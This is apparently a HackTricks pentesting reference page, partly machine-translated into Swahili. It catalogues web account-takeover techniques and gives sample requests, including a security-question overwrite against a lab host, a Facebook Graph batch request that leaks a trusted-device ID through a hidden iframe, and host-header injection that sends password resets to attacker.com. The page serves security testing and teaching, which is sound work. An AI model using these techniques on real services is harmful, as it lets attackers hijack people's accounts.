Account Takeover

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Authorization Issue

Jaribu kubadilisha barua pepe ya akaunti, na mchakato wa uthibitisho unapaswa kuchunguzwa. Ikiwa utagundulika kuwa dhaifu, barua pepe inapaswa kubadilishwa kuwa ya mhusika anayelengwa kisha kuthibitishwa.

Unicode Normalization Issue

1. Akaunti ya mhusika anayelengwa victim@gmail.com
2. Akaunti inapaswa kuundwa kwa kutumia Unicode
   kwa mfano: vićtim@gmail.com

Kama ilivyoelezwa katika this talk, shambulio hapo juu pia linaweza kufanywa kwa kutumia watoa huduma za utambulisho wa upande wa tatu:

• Unda akaunti kwa mtoa utambulisho wa upande wa tatu yenye barua pepe inayofanana na ya mhusika kwa kutumia herufi ya Unicode (vićtim@company.com).
• Mtoa huduma wa upande wa tatu haapaswi kuthibitisha barua pepe
• Ikiwa mtoa utambulisho atathibitisha barua pepe, labda unaweza kushambulia sehemu ya domain kama: victim@ćompany.com na kusajili domain hiyo na kutegemea kwamba mtoa utambulisho atazalisha toleo la ASCII la domain wakati jukwaa la mhusika linanormalize jina la domain.
• Ingia kwa kutumia mtoa utambulisho huyo kwenye jukwaa la mhusika ambalo linapaswa kunormalize tabia ya unicode na kukuruhusu kupata akaunti ya mhusika.

For further details, refer to the document on Unicode Normalization:

Unicode Normalization

Reusing Reset Token

Ikiwa mfumo lengwa unaruhusu reset link to be reused, jitihada zinapaswa kufanywa kutafuta reset links zaidi kwa kutumia zana kama gau, wayback, au scan.io.

Pre Account Takeover

1. Barua pepe ya mhusika inapaswa kutumika kujiandikisha kwenye jukwaa, na nenosiri linapaswa kuwekwa (jaribio la kuthibitisha linapaswa kufanywa, ingawa kukosa ufikiaji wa barua pepe za mhusika kunaweza kufanya hili liswezekane).
2. Inapaswa kusubiri hadi mhusika ajiandikishe kwa kutumia OAuth na kuthibitisha akaunti.
3. Inatarajiwa kwamba usajili wa kawaida utathibitishwa, ukiruhusu ufikiaji wa akaunti ya mhusika.

CORS Misconfiguration to Account Takeover

Ikiwa ukurasa una CORS misconfigurations unaweza kuwa na uwezo wa kuiba taarifa nyeti kutoka kwa mtumiaji ili kuchukua akaunti yake au kumfanya abadilishe taarifa za uthibitisho kwa madhumuni hayo:

CORS - Misconfigurations & Bypass

Csrf to Account Takeover

Ikiwa ukurasa una udhaifu wa CSRF unaweza kuwa na uwezo wa kumfanya mtumiaji abadilishe nenosiri lake, barua pepe au njia za uthibitisho ili wewe kisha uweze kuingia:

CSRF (Cross Site Request Forgery)

XSS to Account Takeover

Ukigundua XSS katika application unaweza kuwa na uwezo wa kuiba cookies, local storage, au taarifa kutoka kwa ukurasa wa wavuti ambazo zinaweza kukuwezesha kuchukua akaunti:

XSS (Cross Site Scripting)

• Attribute-only reflected payloads kwenye login pages zinaweza ku-hook document.onkeypress, ku-exfiltrate keystrokes kupitia new Image().src, na kuiba credentials bila ku-submit fomu. See Attribute-only login XSS behind WAFs for a practical workflow.

Same Origin + Cookies

Ukigundua XSS iliyokomo au subdomain take over, unaweza kuchezana na cookies (kwa mfano fixating) kujaribu kuharibu akaunti ya mhusika:

Cookies Hacking

Attacking Password Reset Mechanism

Reset/Forgotten Password Bypass

Security-question resets that trust client-supplied usernames

Ikiwa mchakato wa “update security questions” unachukua parameter ya username ingawa mtumaji tayari ame-authenticate, unaweza kuandika upya data yoyote ya urejesho ya akaunti (ikiwa ni pamoja na admin) kwa sababu backend kawaida inatekeleza UPDATE ... WHERE user_name = ? na thamani yako isiyohakikishwa. Mfano ni:

1. Ingia kwa mtumiaji wa muda na ushike session cookie.
2. Tuma username ya mhusika pamoja na majibu mapya kupitia fomu ya reset.
3. Mara moja authenticate kupitia endpoint ya login ya security-question kwa kutumia majibu uliyoyaingiza ili upate vibali vya mhusika.

POST /reset.php HTTP/1.1
Host: file.era.htb
Cookie: PHPSESSID=<low-priv>
Content-Type: application/x-www-form-urlencoded

username=admin_ef01cab31aa&new_answer1=A&new_answer2=B&new_answer3=C

Anything gated by the victim’s $_SESSION context (admin dashboards, dangerous stream-wrapper features, etc.) is now exposed without touching the real answers.

Enumerated usernames can then be targeted via the overwrite technique above or reused against ancillary services (FTP/SSH password spraying).

Response Manipulation

If the authentication response could be reduced to a simple boolean just try to change false to true and see if you get any access.

OAuth to Account takeover

OAuth to Account takeover

Host Header Injection

1. The Host header is modified following a password reset request initiation.
2. The X-Forwarded-For proxy header is altered to attacker.com.
3. The Host, Referrer, and Origin headers are simultaneously changed to attacker.com.
4. After initiating a password reset and then opting to resend the mail, all three of the aforementioned methods are employed.

Response Manipulation

1. Code Manipulation: The status code is altered to 200 OK.
2. Code and Body Manipulation:

• The status code is changed to 200 OK.
• The response body is modified to {"success":true} or an empty object {}.

These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.

Change email of current session

From this report:

• Mshambuliaji anaomba kubadilisha email yake na moja mpya
• Mshambuliaji anapokea linki kuthibitisha mabadiliko ya email
• Mshambuliaji anamtumia mwathiriwa linki ili abofye
• Email ya mwathiriwa inabadilishwa kuwa ile iliyoonyeshwa na mshambuliaji
• Shambulio linaweza kurejesha password na kuchukua akaunti

This also happened in this report.

Bypass email verification for Account Takeover

• Mshambuliaji anaingia na attacker@test.com na anathibitisha email wakati wa signup.
• Mshambuliaji anabadilisha email iliyothibitishwa kuwa victim@test.com (hakuna uthibitisho wa pili wakati wa kubadilisha email)
• Sasa tovuti inaruhusu victim@test.com kuingia na tumevuka uthibitisho wa email wa mtumiaji mwathiriwa.

Old Cookies

As explained in this post, ilikuwa inawezekana kuingia kwenye akaunti, kuhifadhi cookies kama mtumiaji aliye authenticated, logout, na kisha kuingia tena.
Kwa login mpya, ingawa cookies tofauti zinaweza kuzalishwa, zile za zamani zilirudisha kufanya kazi tena.

Trusted device cookies + batch API leakage

Long-lived device identifiers that gate recovery can be stolen when a batch API lets you copy unreadable subresponses into writable sinks.

• Tambua a trusted-device cookie (SameSite=None, long-lived) inayotumika kupunguza checks za recovery.
• Tafuta a first-party endpoint inayorudisha device ID hiyo katika JSON (e.g., an OAuth code exchange returning machine_id) lakini haijasomeka cross-origin.
• Tumia a batch/chained API inayoruhusu kurejea subresponses za awali ({result=name:$.path}) na kuziandika kwenye sink inayoonekana kwa mshambuliaji (page post, upload-by-URL, n.k.). Example with Facebook Graph API:

POST https://graph.facebook.com/
batch=[
{"method":"post","omit_response_on_success":0,"relative_url":"/oauth/access_token?client_id=APP_ID%26redirect_uri=REDIRECT_URI","body":"code=SINGLE_USE_CODE","name":"leaker"},
{"method":"post","relative_url":"PAGE_ID/posts","body":"message={result=leaker:$.machine_id}"}
]
access_token=PAGE_ACCESS_TOKEN&method=post

• Pakia batch URL katika <iframe> iliyofichwa ili mwathiriwa atume trusted-device cookie; marejeo ya JSON-path inakili machine_id kwenye post inayodhibitiwa na mshambuliaji hata ingawa jibu la OAuth halisomeki kwenye ukurasa.
• Replay: weka stolen device cookie katika session mpya. Recovery sasa inachukulia kivinjari kama kinachoaminika, mara nyingi ikifichua mtiririko dhaifu zaidi wa “no email/phone” (kwa mfano, uplodi ya nyaraka kiotomatiki) ili kuongeza barua pepe ya mshambuliaji bila password au 2FA.

Marejeleo

• https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/
• https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050
• https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea
• 0xdf – HTB Era: security-question IDOR & username oracle
• Steal DATR Cookie

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.